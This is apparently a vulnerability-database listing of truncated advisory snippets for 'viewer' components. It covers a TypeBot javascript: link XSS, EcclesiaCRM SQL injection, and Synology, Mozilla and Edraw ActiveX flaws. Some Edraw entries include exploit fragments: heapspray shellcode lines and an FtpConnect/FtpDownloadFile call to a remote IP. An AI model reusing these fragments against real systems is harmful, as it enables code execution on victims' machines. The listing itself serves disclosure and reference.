CVE-2026-39964

TypeBot is a chatbot builder tool. In versions prior to 3.16.0, the Typebot viewer packages/embeds/js renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor's browser...

EUVD-2026-23823

A flaw has been found in phili67 Ecclesia CRM up to 8.0.0. This affects the function ValidateInput of the file /v2/query/view/ of the component Query Viewer Component. This manipulation of the argument custom causes sql injection. The attack can be initiated remotely. The exploit has been publish...

CVE-2026-6628

A flaw has been found in phili67 Ecclesia CRM up to 8.0.0. This affects the function ValidateInput of the file /v2/query/view/ of the component Query Viewer Component. This manipulation of the argument custom causes sql injection. The attack can be initiated remotely. The exploit has been publish...

EcclesiaCRM 安全漏洞

EcclesiaCRM is a customer relationship management software for church management, developed by the French individual phili67. Versions of EcclesiaCRM 8.0.0 and earlier contained security vulnerabilities. These vulnerabilities were caused by improper handling of the custom parameter in the...

EUVD-2021-19897

Malware in sbrugna...

Open Design Alliance Drawings SDK 安全漏洞

Open Design Alliance Drawings SDK is a software development kit for drawing design applications from Open Design Alliance, Inc. The Open Design Alliance Drawings SDK contains a security vulnerability that results from an exception vulnerability in the sample The ODA Viewer continues to process...

Synology DiskStation Manager Path Traversal Vulnerability (CNVD-2021-39156)

Synology DiskStation Manager DSM is an operating system for use on Network Storage Servers NAS from Synology Inc. of Taiwan, China. This operating system manages information such as data, files, photos, music, and more. A path traversal vulnerability exists in the PDF Viewer component of Synology...

Unspecified Vulnerability in Oracle Fusion Middleware Oracle Discoverer Component (CNVD-2016-10058)

Oracle Fusion Middleware Oracle Fusion Middleware is a set of Oracle's business innovation platform for enterprise and cloud environments, which provides middleware, software collections, etc. Oracle Discoverer is one of the querying of a variety of information, generating reports, and Web...

Mozilla: Same origin violation and local file stealing via PDF reader (MFSA 2015-78)

A flaw was discovered in Mozilla Firefox that could be used to violate the same-origin policy and inject web script into a non-privileged part of the built-in PDF file viewer PDF.js. An attacker could create a malicious web page that, when viewed by a victim, could steal arbitrary files including...

PDF Viewer Component ActiveX DoS

No description provided by source. Title : PDF Viewer Component ActiveX DoS Auther : Senator of Pirates E-Mail : [email protected] FaceBook : FaceBook.Com/SenatorofPirates Software link : http://www.ocxt.com/download/PDFViewerSetup.exe Date : 05/02/2012 Tested : Windows Xp SP3 EN...

Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method Vuln

No description provided by source. Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vender: EdrawSoft Affected: Edraw PDF Viewer Component 3.2.0.126 other version may also be affected Overview: Edraw PDF Viewer Component is a light...

Design/Logic Flaw

The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in Edraw Office Viewer Component, the client in IBM Cognos Disclosure Management CDM 10.2.0, and other products, allows remote attackers to read arbitrary files, or download an arbitrary program onto a client machine and execute this...

EdrawSoft Office Viewer Component ActiveX 5.6 Buffer Overflow

EdrawSoft Office Viewer Component ActiveX 5.6 officeviewermme.ocx BoF PoC Vendor: EdrawSoft Product web page: http://www.edrawsoft.com Affected version: 5.6.5781 Summary: Edraw Office Viewer Component contains a standard ActiveX control that acts as an ActiveX document container for hosting Offic...

Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow

Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow function heapspray //exec calc.exe var shellcode = unescape "%u9090%u9090%u9090%u9090" ; shellcode += unescape...

Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow

function heapspray //exec calc.exe var shellcode = unescape "%u9090%u9090%u9090%u9090" ; shellcode += unescape...

Design/Logic Flaw

Insecure method vulnerability in the PDFVIEWER.PDFViewerCtrl.1 ActiveX control pdfviewer.ocx in Edraw PDF Viewer Component before 3.2.0.126 allows remote attackers to create and overwrite arbitrary files via a URL argument to the FtpConnect argument and a target filename argument to the...

CVE-2009-2169

CVE-2009-2169: In Edraw PDF Viewer Component, the PDFVIEWER.PDFViewerCtrl.1 ActiveX control (pdfviewer.ocx) before 3.2.0.126 contains an insecure method vulnerability. An attacker can remotely create and overwrite arbitrary files by passing a URL argument to FtpConnect and a target filename to Ft...

Edraw PDF Viewer Component Code Execution

Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vender: EdrawSoft Affected: Edraw PDF Viewer Component target.FtpConnect "ftp://192.168.220.201", "test", "tester" target.FtpDownloadF...

[Full-disclosure] Edraw PDF Viewer Component ActiveX Remote code execution vulnerability

Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vender: EdrawSoft Affected: Edraw PDF Viewer Component 3.2.0.126 other version may also be affected Overview: "Edraw PDF Viewer Component is a light weight ActiveX Control which...

Edraw PDF Viewer Component &lt; 3.2.0.126 ActiveX Insecure Method vulnerability

No description provided by source. Edraw PDF Viewer Component ActiveX Remote code execution vulnerability By Jambalaya of Nevis Labs Date: 2009.06.16 Vender: EdrawSoft Affected: Edraw PDF Viewer Component 3.2.0.126 other version may also be affected Overview: "Edraw PDF Viewer Component is a ligh...